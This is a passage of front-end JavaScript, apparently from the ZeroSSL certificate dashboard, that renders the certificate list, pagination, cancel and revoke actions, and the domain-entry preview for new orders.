
            // ACME certificates display information
            if(response.message.acmeLocked === true) {
                // display message
                let alertsContainer = body.find('.content aside.alerts');
                let message = &quot;&quot;;
                if(response.message.acmeUsageLevel === &quot;MEDIUM&quot;) {
                    message = &quot;Note: Your account is holding more than 100 ACME certificates. For using the Dashboard or API with this amount of ACME certificates you have to upgrade at least to the ZeroSSL basic plan.&quot;
                } else if(response.message.acmeUsageLevel === &quot;HIGH&quot;) {
                    message = &quot;Note: Your account is holding more than 100.000 ACME certificates. For using the Dashboard or API with this amount of ACME certificates you have to upgrade at least to the ZeroSSL premium plan.&quot;
                }
                alertsContainer.html('&lt;p class=&quot;alert info&quot;&gt;'+message+'&lt;/p&gt;');
            }

			// table metadata
			var metaContent;
			var metaNumberPages = Math.ceil(response.message.total_count / response.message.limit);

			var pagesPlural = metaNumberPages &gt; 1 ? 'pages' : 'page';
			var resultsPlural = response.message.total_count &gt; 1 ? 'results' : 'result';

			metaContent = 'Showing &lt;strong&gt;'+response.message.total_count+' '+resultsPlural+' &lt;/strong&gt; on '+metaNumberPages+' '+pagesPlural;

			// generate pagination section
			generatePaginationSection(response.message.total_count);

			if (response.message.total_count &gt; 0) {
				let rowClass = &quot;&quot;;
				if (showProtectionColumn) {
					rowClass = &quot;has-protection-column&quot;;
				}

				// table headings are static
				var tableContent = '&lt;li class=&quot;headings ' + rowClass + '&quot;&gt; &lt;div class=&quot;title&quot;&gt; &lt;span&gt;Type&lt;/span&gt; &lt;/div&gt;&lt;div class=&quot;domains&quot;&gt; &lt;span&gt;Domains&lt;/span&gt; &lt;/div&gt;&lt;div class=&quot;status&quot;&gt; &lt;span&gt;Status&lt;/span&gt; &lt;/div&gt;';
				if (showProtectionColumn) {
					tableContent += '&lt;div class=&quot;protection&quot;&gt;&lt;span&gt;Protect&lt;/span&gt;&lt;/div&gt;';
				}
				tableContent += '&lt;div class=&quot;expiration&quot;&gt; &lt;span&gt;Expires&lt;/span&gt; &lt;/div&gt;&lt;div class=&quot;actions&quot;&gt; &lt;span&gt;&lt;/span&gt; &lt;/div&gt; &lt;/li&gt;';

				// table content rows are dynamic
				$.each(response.message.results, function(i) {

					var certHash = response.message.results[i].id;
					var certCommonName = response.message.results[i].common_name;
					var certStatus = response.message.results[i].status;
					var certIsMultiDomain = false;
                    var certDomainProtection = response.message.results[i].protection ?? &quot;none&quot;;

					var certExpirationDate = new Date(normalizeDate(response.message.results[i].expires));

					// calculate days to expiration, this is used further
					// below to identify which certs are &quot;expiring soon&quot;
					var currentDate = new Date();
					var diffTime = Math.abs(currentDate - certExpirationDate);
					var diffDays = Math.ceil(diffTime / (1000 * 60 * 60 * 24));

					var months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'];
					var d = certExpirationDate.getDate();
					var m =  months[certExpirationDate.getMonth()];
					var y = certExpirationDate.getFullYear();

					certExpirationDate = m + ' ' + d + ', ' + y;

					var certType;

					switch (parseInt(response.message.results[i].type)) {

						case 1:
						certType = '90-Day SSL';
						break;

						case 2:
						certType = '90-Day Wildcard';
						break;

						case 3:
						certType = '90-Day SSL';
						certIsMultiDomain = true;
						break;

						case 4:
						certType = '1-Year SSL';
						break;

						case 5:
						certType = '1-Year Wildcard';
						break;

						case 6:
						certType = '1-Year SSL';
						certIsMultiDomain = true;
						break;

						default:
						certType = 'Certificate';
						break;

					}

					var certStatus;
					var certStatusClass;

					var primaryAction;
					var dropdownActions = [];

                    let brandValidation = false;

					switch (response.message.results[i].status) {

						case 'draft':
						certStatus = 'Draft';
						certStatusClass = 'draft';
						primaryAction = 'continue_certificate';
						dropdownActions.push('copy_hash', 'cancel_certificate');
						break;

						case 'issued':

							// expiring_soon is not a real API status, which is
							// why we need to check if expiry date below 30 days
							if (diffDays &lt;= 30) {
							certStatus = 'Expiring Soon';
							certStatusClass = 'expiring';
							primaryAction = 'renew_certificate';
							dropdownActions.push('copy_hash', 'download_certificate', 'revoke_certificate');
							} else {
							certStatus = 'Issued';
							certStatusClass = 'issued';
							primaryAction = 'install_certificate';
							dropdownActions.push('copy_hash', 'download_certificate', 'revoke_certificate');
							}
						break;

						case 'pending_validation':
						certStatus = 'Pending Validation';
						certStatusClass = 'pending_validation';
						primaryAction = 'validation_status';
						dropdownActions.push('copy_hash', 'cancel_certificate');
                        brandValidation = (response.message.results[i].brand_validation === &quot;false&quot;) ? false : !!response.message.results[i].brand_validation
						break;

						case 'expired':
						certStatus = 'Expired';
						certStatusClass = 'expired';
						primaryAction = 'renew_certificate';
						dropdownActions.push('copy_hash');
						break;

						case 'cancelled':
						certStatus = 'Cancelled';
						certStatusClass = 'cancelled';
						primaryAction = 'copy_hash';
						//dropdownActions.push('copy_hash');
						break;

                        case 'revoked':
                        certStatus = 'Revoked';
                        certStatusClass = 'revoked';
                        primaryAction = 'copy_hash';
                        break;

                        default:
						certStatus = 'Unknown';
						certStatusClass = 'draft';
						primaryAction = 'copy_hash';
						//dropdownActions.push('copy_hash');
						break;

					}

					// actions
					var certActions = '';
					var additionalPrimaryButtonClass = '';

					if (dropdownActions.length &lt; 1) {
					additionalPrimaryButtonClass = 'alone';
					}

					switch (primaryAction) {

						case 'copy_hash':
						certActions += '&lt;a class=&quot;button primary '+additionalPrimaryButtonClass+'&quot; title=&quot;Copy Certificate Hash&quot; data-action=&quot;copy_to_clipboard&quot; data-action-id=&quot;'+certHash+'&quot; href=&quot;javascript:void(0)&quot;&gt;Copy Hash&lt;/a&gt;';
						break;

						case 'install_certificate':
						certActions += '&lt;a class=&quot;button primary '+additionalPrimaryButtonClass+'&quot; title=&quot;Install Certificate&quot; href=&quot;/certificate/install/'+certHash+'&quot; data-ajax=&quot;true&quot; data-ajax-get-file=&quot;install&quot; data-ajax-get-page=&quot;install&quot; data-ajax-get-id=&quot;'+certHash+'&quot; href=&quot;javascript:void(0)&quot;&gt;Install&lt;/a&gt;';
						break;

						case 'validation_status':
						certActions += '&lt;a class=&quot;button primary '+additionalPrimaryButtonClass+'&quot; title=&quot;Validation Status&quot; href=&quot;/certificate/verify/'+certHash+'/status&quot; data-ajax=&quot;true&quot; data-ajax-get-file=&quot;verify&quot; data-ajax-get-page=&quot;verify&quot; data-ajax-get-type=&quot;status&quot; data-ajax-get-id=&quot;'+certHash+'&quot; href=&quot;javascript:void(0)&quot;&gt;Status&lt;/a&gt;';
						break;

						case 'continue_certificate':
						certActions += '&lt;a class=&quot;button primary '+additionalPrimaryButtonClass+'&quot; title=&quot;Validate Certificate&quot; href=&quot;/certificate/verify/'+certHash+'&quot; data-ajax=&quot;true&quot; data-ajax-get-file=&quot;verify&quot; data-ajax-get-page=&quot;verify&quot; data-ajax-get-id=&quot;'+certHash+'&quot; href=&quot;javascript:void(0)&quot;&gt;Verify&lt;/a&gt;';
						break;

						case 'renew_certificate':
						certActions += '&lt;a class=&quot;button primary '+additionalPrimaryButtonClass+'&quot; title=&quot;Renew Certificate&quot; href=&quot;/certificate/renew/'+certHash+'&quot; data-ajax=&quot;true&quot; data-ajax-get-file=&quot;order&quot; data-ajax-get-page=&quot;order&quot; data-ajax-get-id=&quot;'+certHash+'&quot;&gt;Renew&lt;/a&gt;';
						break;

					}

					// show dropdown actions if available
					if (dropdownActions.length &gt; 0) {

						certActions += '&lt;a data-dropdown=&quot;toggle&quot; href=&quot;javascript:void(0)&quot;&gt;&lt;/a&gt;';
						certActions += '&lt;ul data-dropdown=&quot;menu&quot; class=&quot;dropdown_menu&quot;&gt;';

						if ($.inArray('copy_hash', dropdownActions) != -1) {
						certActions += '&lt;li&gt;&lt;a title=&quot;Copy Certificate Hash&quot; data-action=&quot;copy_to_clipboard&quot; data-action-id=&quot;'+certHash+'&quot; href=&quot;javascript:void(0)&quot;&gt;Copy Hash&lt;/a&gt;&lt;/li&gt;';
						}

						if ($.inArray('cancel_certificate', dropdownActions) != -1) {
							let totalDomains = 1; // Default to 1

							// Only count additional domains for multi-domain certificates
							if (certIsMultiDomain === true &amp;&amp; response.message.results[i].additional_domains) {
								let additionalDomainsArray = response.message.results[i].additional_domains.split(',');

								// Separate valid domains and IPs
								let validDomains = additionalDomainsArray.filter(domain =&gt; !isIPAddress(domain));
								let ipAddresses = additionalDomainsArray.filter(domain =&gt; isIPAddress(domain));

								totalDomains = validDomains.length + ipAddresses.length + 1;
							}

							certActions += '&lt;li&gt;&lt;a title=&quot;Cancel Certificate&quot; data-action=&quot;cancel_certificate&quot; data-action-id=&quot;' + certHash + '&quot; data-total-domains=&quot;' + totalDomains + '&quot; href=&quot;javascript:void(0)&quot;&gt;Cancel Certificate&lt;/a&gt;&lt;/li&gt;';
						}


						if ($.inArray('download_certificate', dropdownActions) != -1) {
						certActions += '&lt;li&gt;&lt;a href=&quot;javascript:void(0)&quot; title=&quot;Download Certificate&quot; data-action=&quot;wizard[install][download_certificate]&quot; data-action-id=&quot;'+certHash+'&quot; data-action-filename=&quot;'+certCommonName+'&quot;&gt;Download Certificate&lt;/a&gt;&lt;/li&gt;';
						}

						if ($.inArray('renew_certificate', dropdownActions) != -1) {
						certActions += '&lt;li&gt;&lt;a title=&quot;Renew Certificate&quot; href=&quot;/certificate/renew/'+certHash+'&quot; data-ajax=&quot;true&quot; data-ajax-get-file=&quot;order&quot; data-ajax-get-page=&quot;order&quot; data-ajax-get-id=&quot;'+certHash+'&quot;&gt;Renew Certificate&lt;/a&gt;&lt;/li&gt;';
						}

                        if ($.inArray('revoke_certificate', dropdownActions) != -1) {
                            certActions += '&lt;li&gt;&lt;a title=&quot;Revoke Certificate&quot; data-action=&quot;revoke_certificate&quot; data-action-id=&quot;'+certHash+'&quot; href=&quot;javascript:void(0)&quot;&gt;Revoke Certificate&lt;/a&gt;&lt;/li&gt;';
                        }

						certActions += '&lt;/ul&gt;';

					}
					// adding function to check if domain is IP
					function isIPAddress(domain) {
						return /^(?:\d{1,3}\.){3}\d{1,3}$/.test(domain) ||
							/^(?:[a-fA-F0-9:]+:+)+[a-fA-F0-9]+$/.test(domain);
					}

					var certMultiDomainViewer = '';


					// if more than one domain in cert and type is 3 (90-day multi-domain) or 6 (1-year multi-domain)
					// Check if the certificate has additional domains

					if (response.message.results[i].additional_domains &amp;&amp; response.message.results[i].additional_domains.split(',').length &gt; 0) {
						// More than one domain and cert is multi-domain type
						if (certIsMultiDomain === true) {
							let additionalDomainsArray = response.message.results[i].additional_domains.split(',');

							// Separate valid domains and IPs
							let validDomains = additionalDomainsArray.filter(domain =&gt; !isIPAddress(domain));
							let ipAddresses = additionalDomainsArray.filter(domain =&gt; isIPAddress(domain));

							let totalDomains = validDomains.length + ipAddresses.length;

							if (totalDomains &gt; 0) {
								// Show full count including IPs and allow user to copy them
								let tooltipText = 'Multi-Domain Certificate (' + certType + ') with ' + (totalDomains + 1) + ' entries. Click to see all protected domains.';
								let actionId = certCommonName + ',' + additionalDomainsArray.join(',');

								certMultiDomainViewer = `&lt;small class=&quot;custom&quot; data-tooltip=&quot;${tooltipText}&quot; data-action=&quot;view_cert_domains&quot; data-action-id=&quot;${actionId}&quot;&gt;${totalDomains + 1}&lt;/small&gt;`;
							} else {
								// If all entries are IPs, still show count
								certMultiDomainViewer = `&lt;small class=&quot;custom&quot; data-tooltip=&quot;Multi-Domain Certificate includes only IP addresses, which are not fully supported. Click to see details.&quot; data-action=&quot;view_cert_domains&quot; data-action-id=&quot;${certCommonName},${ipAddresses.join(',')}&quot;&gt;${ipAddresses.length + 1}&lt;/small&gt;`;
							}
						}
					}



					let brandValidationHtml = '';

					if (brandValidation) {
						brandValidationHtml = '&lt;i class=&quot;brand_validation&quot; data-tooltip=&quot;Brand validation: Verification has passed, but our team has to check manually if we are allowed to issue a certificate for that domain. This may take a certain amount of time.&quot;&gt;&lt;/i&gt;';
					}

					let protectCta = &quot;&quot;;
					let protectionStatus = certDomainProtection;  // This is where we determine the protection status (monitor, premium, none)

					// Check if it's an IP address
					if (isIPAddress(certCommonName)) {
						// IP addresses cannot be protected
						protectCta = '&lt;a class=&quot;protect-domain-certlist protection-' + certDomainProtection + '&quot; href=&quot;#&quot; title=&quot;Protection for IP addresses is not available&quot;&gt;&lt;span class=&quot;protection custom ' + certDomainProtection + '&quot; data-ptooltip=&quot;Protect for IP addresses is not available&quot;&gt;n/a&lt;/span&gt;&lt;/a&gt;';
					} else if (certStatusClass === 'issued' || certStatusClass === 'expiring') {
						// Handle the protection for valid domains (not IPs)
						let cptooltip = 'Protect and monitor this domain using ZeroSSL Protect.';
						let cpText = '';

						// Determine the protection level
						if (protectionStatus === &quot;monitor&quot;) {
							cptooltip = 'Protected by ZeroSSL surface protect.';
							cpText = 'Surface';
						} else if (protectionStatus === &quot;premium&quot;) {
							cptooltip = 'Protected by ZeroSSL core protect.';
							cpText = 'Core';
						} else {
							cptooltip = 'Domain is not protected';
							cpText = 'None';
						}

						// Generate protection button for domains
						protectCta = '&lt;a class=&quot;protect-domain-certlist protection-' + certDomainProtection + '&quot; href=&quot;/protection?protect_domain='+certCommonName+'&quot;&gt;&lt;span class=&quot;protection custom ' + certDomainProtection + '&quot; data-ptooltip=&quot;' + cptooltip + '&quot;&gt;' + cpText + '&lt;/span&gt;&lt;/a&gt;';

						if (!protectionEnabled) {
							protectCta = '&lt;a href=&quot;/protection&quot;&gt;&lt;span class=&quot;protection none&quot;&gt; Try Feature&lt;/a&gt;';
						}
					}
					// Build the row for the certificate
					var thisRow = '&lt;li class=&quot;' + rowClass + '&quot;&gt; &lt;div class=&quot;title&quot;&gt; &lt;span&gt;' + certType + '&lt;/span&gt; &lt;/div&gt;&lt;div class=&quot;domains custom fulldomain&quot; data-tooltip=&quot;' + certCommonName + '&quot;&gt; &lt;span class=&quot;custom&quot; style=&quot;cursor:pointer;&quot; data-action=&quot;view_cert_domains&quot; data-action-id=&quot;' + certCommonName + ',' + response.message.results[i].additional_domains + '&quot;&gt;' + certCommonName + '&lt;/span&gt;' + certMultiDomainViewer + ' &lt;/div&gt;&lt;div class=&quot;status ' + certStatusClass + '&quot;&gt; &lt;span&gt;' + certStatus + '&lt;/span&gt; ' + brandValidationHtml + ' &lt;/div&gt;';

					if (showProtectionColumn) {
						thisRow += '&lt;div class=&quot;protection&quot;&gt;' + protectCta + '&lt;/div&gt;';
					}

					thisRow += '&lt;div class=&quot;expiration&quot;&gt; &lt;span&gt;' + certExpirationDate + '&lt;/span&gt; &lt;/div&gt;&lt;div class=&quot;actions dropdown&quot;&gt; ' + certActions + ' &lt;/div&gt;&lt;/li&gt;';

					tableContent += thisRow;


				});

				table.find('ul').html(tableContent);

			} else {

				metaContent = '';

				// no results
				table.find('ul').html('&lt;li class=&quot;no_results&quot;&gt;No Results &lt;a href=&quot;/certificate/new&quot; data-ajax=&quot;true&quot; data-ajax-get-file=&quot;order&quot; data-ajax-get-page=&quot;order&quot;&gt;Create Certificate&lt;/a&gt;&lt;/li&gt;');

			}

			// show table metadata
			body.find('span.pagination_meta').html(metaContent);

		}

	});

}


/* COPY TO CLIPBOARD */
body.on('click', '[data-action=&quot;copy_to_clipboard&quot;]', function() {
	&quot;use strict&quot;;

	var container = $(this);
	var valueToCopy = container.attr('data-action-id');

    var $temp = $(&quot;&lt;input&gt;&quot;);
    $(&quot;body&quot;).append($temp);
    $temp.val(valueToCopy).select();

    document.execCommand(&quot;copy&quot;);

    $temp.remove();

	generalInfo('show', 'success', 'Certificate hash copied to clipboard.');

});


/* CERTIFICATE LIST - GENERATE PAGINATION SECTION */
function generatePaginationSection(totalCount) {

	var additionalStatusFilter = ['/'+escapeHtml(parameterStatus), '&amp;status='+escapeHtml(parameterStatus)];

	var paginationContent = '';

	// calculate number of pages and generate buttons
	var numberOfPages = Math.ceil(totalCount / parameterLimit);

	var previousDisabled = parameterPage &lt; 2 ? 'disabled' : '';
	var nextDisabled = parameterPage &gt;= numberOfPages ? 'disabled' : '';

	if (!totalCount) {
	previousDisabled = 'disabled';
	nextDisabled = 'disabled';
	}

	var previousPage = parameterPage - 1;
	var nextPage = parseInt(parameterPage) + 1;

	// back to start button
	paginationContent += '&lt;a href=&quot;/certificates'+additionalStatusFilter[0]+'/search:'+escapeHtml(parameterSearch) +'/page:1&quot; data-ajax=&quot;true&quot; data-ajax-get-file=&quot;certificates&quot; data-ajax-get-page=&quot;certificates&quot; data-ajax-get-type=&quot;&quot; data-ajax-get-parameters=&quot;'+additionalStatusFilter[1]+'&amp;search=search:'+escapeHtml(parameterSearch)+'&amp;pageno=page:1&quot; class=&quot;paginate_button start '+previousDisabled+'&quot; tabindex=&quot;0&quot;&gt;&lt;/a&gt;';

	// previous button
	paginationContent += '&lt;a href=&quot;/certificates'+additionalStatusFilter[0]+'/search:'+escapeHtml(parameterSearch)+'/page:'+previousPage+'&quot; data-ajax=&quot;true&quot; data-ajax-get-file=&quot;certificates&quot; data-ajax-get-page=&quot;certificates&quot; data-ajax-get-type=&quot;&quot; data-ajax-get-parameters=&quot;'+additionalStatusFilter[1]+'&amp;search=search:'+escapeHtml(parameterSearch)+'&amp;pageno=page:'+previousPage+'&quot; class=&quot;paginate_button previous '+previousDisabled+'&quot; tabindex=&quot;0&quot;&gt;&lt;/a&gt;';

	for (index = 1; index &lt;= numberOfPages; index++) {

		var currentClass = index == parameterPage ? 'current' : '';

		// calculate difference between loop index and current page	number
		var differenceToIndex = parameterPage - index;
		differenceToIndex = (differenceToIndex &lt; 1) ? (differenceToIndex * -1) : differenceToIndex;

		var paginationReach = 2;
		var maxPagesShowing = 1 + (2 * paginationReach);

		if (parameterPage == 1 || parameterPage == numberOfPages) {
		paginationReach = 4;
		} else if (parameterPage == 2 || parameterPage == (numberOfPages - 1)) {
		paginationReach = 3;
		}

		// show only pages that are X larger or X smaller than the current page number
		if (differenceToIndex &lt;= paginationReach) {
		paginationContent += '&lt;a href=&quot;/certificates'+additionalStatusFilter[0]+'/search:'+escapeHtml(parameterSearch)+'/page:'+index+'&quot; data-ajax=&quot;true&quot; data-ajax-get-file=&quot;certificates&quot; data-ajax-get-page=&quot;certificates&quot; data-ajax-get-type=&quot;&quot; data-ajax-get-parameters=&quot;'+additionalStatusFilter[1]+'&amp;search=search:'+escapeHtml(parameterSearch)+'&amp;pageno=page:'+index+'&quot; class=&quot;paginate_button '+currentClass+'&quot; data-table-page=&quot;'+index+'&quot; tabindex=&quot;0&quot;&gt;'+index+'&lt;/a&gt;';
		}

	}

	// next button
	paginationContent += '&lt;a href=&quot;/certificates'+additionalStatusFilter[0]+'/search:'+escapeHtml(parameterSearch)+'/page:'+nextPage+'&quot; data-ajax=&quot;true&quot; data-ajax-get-file=&quot;certificates&quot; data-ajax-get-page=&quot;certificates&quot; data-ajax-get-type=&quot;&quot; data-ajax-get-parameters=&quot;'+additionalStatusFilter[1]+'&amp;search=search:'+escapeHtml(parameterSearch)+'&amp;pageno=page:'+nextPage+'&quot; class=&quot;paginate_button next '+nextDisabled+'&quot; tabindex=&quot;0&quot;&gt;&lt;/a&gt;';

	// go to last page button
	paginationContent += '&lt;a href=&quot;/certificates'+additionalStatusFilter[0]+'/search:'+escapeHtml(parameterSearch)+'/page:'+numberOfPages+'&quot; data-ajax=&quot;true&quot; data-ajax-get-file=&quot;certificates&quot; data-ajax-get-page=&quot;certificates&quot; data-ajax-get-type=&quot;&quot; data-ajax-get-parameters=&quot;'+additionalStatusFilter[1]+'&amp;search=search:'+escapeHtml(parameterSearch)+'&amp;pageno=page:'+numberOfPages+'&quot; class=&quot;paginate_button end '+nextDisabled+'&quot; tabindex=&quot;0&quot;&gt;&lt;/a&gt;';

	body.find('[data-table=&quot;pagination&quot;]').html(paginationContent);

}


/* CERTIFICATE LIST - SEARCH */
body.on('submit', '[name=&quot;table_search&quot;]', function(event) {

	event.preventDefault();

	var additionalStatusFilter = ['/'+escapeHtml(parameterStatus), '&amp;status='+escapeHtml(parameterStatus)];

	var searchTerm = $(this).find('[data-table=&quot;search&quot;]').val();

	goToPage('/certificates'+additionalStatusFilter[0]+'/search:'+searchTerm+'/page:1', currentFile, currentPage, currentType, currentID, false, null, additionalStatusFilter[1]+'&amp;search=search:'+searchTerm+'&amp;pageno=page:1', false);

});


/* CERTIFICATE LIST - VIEW CERT DOMAINS */
body.on('click', '[data-action=&quot;view_cert_domains&quot;]', function() {

	var domainArray = $(this).attr('data-action-id');

	openPopup('view_cert_domains', domainArray);

});



/* AJAX - CANCEL CERTIFICATE */

function updateCancelPopup(certCount, totalDomains) {
	let warningMessage = document.querySelector(&quot;#confirm_cancel_certificate .cancelWarningMessage&quot;);
	if (!warningMessage) {
		return {
			success: false,
			error: 'Warning message element not found',
			details: {
				selector: &quot;#confirm_cancel_certificate .cancelWarningMessage&quot;,
				containerExists: !!document.querySelector(&quot;#confirm_cancel_certificate&quot;),
				totalDomains: totalDomains
			}
		};
	}

	totalDomains = parseInt(totalDomains, 10) || 1;

	try {
		if (totalDomains &gt; 1) {
			warningMessage.innerHTML = `Cancelling this multi-domain certificate will free up &lt;strong&gt;${totalDomains}&lt;/strong&gt; credits on your account.`;
		} else {
			warningMessage.innerHTML = `Cancelling this certificate will free up &lt;strong&gt;1&lt;/strong&gt; credit on your account.`;
		}

		// Return success object
		return {
			success: true,
			message: 'Warning message updated successfully'
		};
	} catch (error) {
		// Catch any unexpected errors during innerHTML setting
		return {
			success: false,
			error: 'Failed to update warning message',
			details: error.message
		};
	}
}

body.on('click', '[data-action=&quot;cancel_certificate&quot;]', function(event) {

	event.preventDefault();

	let button = $(this);

	const certId = button.attr('data-action-id');
	const certList = $('[data-action=&quot;cancel_certificate&quot;][data-selected=&quot;true&quot;]');
	const certCount = certList.length || 1;

	const totalDomains = parseInt(button.attr('data-total-domains'), 10) || 1;


	const postData = {
		id: certId,
		count: certCount,
		total_domains: totalDomains
	};

	updateCancelPopup(certCount, totalDomains);

	const postDataJSON = JSON.stringify(postData);
	//console.log(postDataJSON);

	if (!button.attr('data-action-confirmed')) {

		openPopup('confirm_cancel_certificate', postData, function () {
			setTimeout(() =&gt; {
				updateCancelPopup(certCount, totalDomains);
			}, 100); // Ensure the pop-up is loaded
		});
		body.on('submit', 'form[name=&quot;confirm_cancel_certificate&quot;]', function(event) {

			event.preventDefault();

			// add confirmation tag for a second, re-submit action, then remove confirmation tag
			button.attr('data-action-confirmed', 'true').click().removeAttr('data-action-confirmed');

		});

		return false;

	}

	body.find('.popup button[type=&quot;submit&quot;]').addClass('loading');

	$.ajax({
		type: &quot;POST&quot;,
		url: '/ajax/advanced_ajax_handler.php?type=zerossl_cancel_certificate&amp;_cpt=' + getCookie('_cpt'),
		data: ({ postArray: postDataJSON }),
		dataType: &quot;json&quot;,
		error: function(XMLHttpRequest, textStatus, errorThrown) {
     		//alert(textStatus + ', ' + errorThrown);
  		},
		success: function(data){

			if (data.success === 1) {

				// reload page if removed successfully
				generalInfo('show', 'success', 'Certificate cancelled.');
				reloadPage();

				setTimeout( function(){
				closePopup();
				}, 1000);


			}  else {

				body.find('.popup button[type=&quot;submit&quot;]').removeClass('loading');
				generalInfo('show', 'error', translateError(data.message));

			}

			return false;

		}

	});

    $.ajax({
        type: &quot;POST&quot;,
        url: '/ajax/advanced_ajax_handler.php?type=zerossl_cancel_certificate&amp;_cpt=' + getCookie('_cpt'),
        data: ({ postArray: postDataJSON }),
        dataType: &quot;json&quot;,
        error: function(XMLHttpRequest, textStatus, errorThrown) {
            //alert(textStatus + ', ' + errorThrown);
        },
        success: function(data){

            if (data.success === 1) {

                // reload page if removed successfully
                generalInfo('show', 'success', 'Certificate cancelled.');
                reloadPage();

                setTimeout( function(){
                    closePopup();
                }, 1000);


            }  else {

                body.find('.popup button[type=&quot;submit&quot;]').removeClass('loading');
                generalInfo('show', 'error', translateError(data.message));

            }

            return false;

        }

    });

});

/* AJAX - REVOKE CERTIFICATE */
body.on('click', '[data-action=&quot;revoke_certificate&quot;]', function(event) {

    event.preventDefault();

    let button = $(this);

    const	postData = {
        id: $(this).attr('data-action-id'),
        reason: $(&quot;#revocation_reason&quot;).val()
    };

    const postDataJSON = JSON.stringify(postData);

    if (!button.attr('data-action-confirmed')) {

        openPopup('confirm_revoke_certificate');

        body.on('submit', 'form[name=&quot;confirm_revoke_certificate&quot;]', function(event) {

            event.preventDefault();

            // add confirmation tag for a second, re-submit action, then remove confirmation tag
            button.attr('data-action-confirmed', 'true').click().removeAttr('data-action-confirmed');

        });

        return false;

    }

    body.find('.popup button[type=&quot;submit&quot;]').addClass('loading');

    $.ajax({
        type: &quot;POST&quot;,
        url: '/ajax/advanced_ajax_handler.php?type=zerossl_revoke_certificate&amp;_cpt=' + getCookie('_cpt'),
        data: ({ postArray: postDataJSON }),
        dataType: &quot;json&quot;,
        error: function(XMLHttpRequest, textStatus, errorThrown) {
            //alert(textStatus + ', ' + errorThrown);
        },
        success: function(data){

            if (data.success === 1) {

                // reload page if removed successfully
                generalInfo('show', 'success', 'Certificate revoked.');
                reloadPage();

                setTimeout( function(){
                    closePopup();
                }, 1000);


            }  else {

                body.find('.popup button[type=&quot;submit&quot;]').removeClass('loading');
                generalInfo('show', 'error', translateError(data.message));

            }

            return false;

        }

    });

});


/* ORDER - DOMAINS PREVIEW */
function processDomainsToProtect(that, trigger) {

	that.val(that.val().replace(/['&quot;]/gi, ''));

    let thisValue = that.val();

    let isSubdomain = false;
    let isWildcard = false;
    let isMultiDomain = false;
    let isIpAddress = false;

    // trim leading and trailing white-spaces
	thisValue = $.trim(thisValue);

	// check for /paths
	if (thisValue.indexOf('/') &gt;= 0) {
	    thisValue = thisValue.substring(0, thisValue.indexOf('/'));
	}

	// check if multiple domains
	if (body.find('.domain_collection .domain').length &gt; 1) {
	    isMultiDomain = true;
	}

	// remove &quot;www.&quot; from domain, but only if not multi-domain
    let wwwSubdomainWasRemoved = false;
	const alreadyContainsWWW = thisValue.indexOf('www.') &gt;= 0;
	let originalValue = thisValue; // Before it possibly gets www stripped

	// do strip www from input, when input already contains www, in order to prevent www.www situations
	// and if it is not a multidomain
	// and if input is not a subdomain (ZERO-224)
	if (alreadyContainsWWW &gt;= 0 &amp;&amp; isMultiDomain !== true &amp;&amp; subDomain(thisValue) === false) {
	    thisValue = thisValue.replace(/www./, '');
        wwwSubdomainWasRemoved = true;
	}

    that.closest('.domain').find('.preview span').show();
    that.closest('.domain').find('.remove_domain').remove(); // always remove the removal buttons first

	// check for existing submit values that have the same content (&quot;not&quot; the current submit value)
	if (thisValue &amp;&amp; body.find('[name=&quot;wizard[order][domains][domain][submit_value]&quot;][value=&quot;'+thisValue+'&quot;]').not($(that).closest('.domain').find('[name=&quot;wizard[order][domains][domain][submit_value]&quot;]')).length &gt; 0) {
		that.closest('.domain').find('[name=&quot;wizard[order][domains][domain][submit_value]&quot;]').val('');

		that.closest('.domain').find('.preview').show();
		that.closest('.domain').find('.preview').addClass('error');
		that.closest('.domain').find('.preview span:nth-child(1)').html('Duplicate');
		that.closest('.domain').find('.preview span:nth-child(2)').html('');
		return false;

	}

	if (ipAddress(thisValue)) {
	    isIpAddress = true;
    } else if (subDomain(thisValue)) {
	    isSubdomain = true;
	}

	// check for *. wildcard indicator or checked wildcard checkbox
	if (thisValue.indexOf('*.') &gt;= 0 || body.find('[name=&quot;wizard[order][domains][wildcard]&quot;]').is(':checked')) {
        thisValue = thisValue.replace('*.', '');
		isWildcard = true;
		wildcardMode('on');
		// if multiple domains entered, move the wildcard domain to the top of domains
		if (body.find('.domain_collection .domain').length &gt; 1) {
		$(that).closest('.domain').detach().insertBefore('.domain_collection .domain:first');
		}

	}

	// now validate domain
	if (isValidDomain(thisValue) &amp;&amp; !isBlockedDomain(thisValue)) {

        that.closest('.domain').find('.preview').removeClass('error');

        // add submit value
        that.closest('.domain').find('[name=&quot;wizard[order][domains][domain][submit_value]&quot;]').val(thisValue);

        // add non-www preview value
        that.closest('.domain').find('.preview span:nth-child(1)').html(thisValue);

        if (isSubdomain === true &amp;&amp; isWildcard !== true) {

            that.closest('.domain').find('.preview span:nth-child(2)').hide();

        } else if (isWildcard === true &amp;&amp; isSubdomain === true) {

            const domainParts = thisValue.split('.');
			domainParts.unshift(&quot;*&quot;);
			const wildCardSubDomainValue = domainParts.join(&quot;.&quot;);

            that.closest('.domain').find('[name=&quot;wizard[order][domains][domain][submit_value]&quot;]').val(wildCardSubDomainValue);
            that.closest('.domain').find('[name=&quot;wizard[order][domains][domain]&quot;]').val(wildCardSubDomainValue);

            that.closest('.domain').find('.preview span:nth-child(1)').html(wildCardSubDomainValue);
            that.closest('.domain').find('.preview span:nth-child(2)').hide();

        } else if (isWildcard === true) {

            that.closest('.domain').find('[name=&quot;wizard[order][domains][domain][submit_value]&quot;]').val('*.' + thisValue);
            that.closest('.domain').find('[name=&quot;wizard[order][domains][domain]&quot;]').val('*.' + thisValue);

            that.closest('.domain').find('.preview span:nth-child(1)').html('*.' + thisValue);
            that.closest('.domain').find('.preview span:nth-child(2)').hide();

        } else if (isMultiDomain === true) {

            // empty &amp; hide all (not only this) auto-included www-versions
            body.find('.preview span:nth-child(2)').html('').hide();
        } else if (isIpAddress) {
            that.closest('.domain').find('.preview span:nth-child(2)').hide();

        } else {
			const domainEl = that.closest('.domain');
			const firstChildSpan = domainEl.find('.preview span:nth-child(1)');
			const secondChildSpan = domainEl.find('.preview span:nth-child(2)');
			firstChildSpan.removeClass('preview-with-www');

			// Correct the layout if there are two options shown. The first should be the original value the user typed
			if (originalValue.indexOf(&quot;www.&quot;) &gt;= 0) {
				firstChildSpan.html(originalValue);
				firstChildSpan.addClass(&quot;preview-with-www&quot;);
				secondChildSpan.html(thisValue); // Non-www version
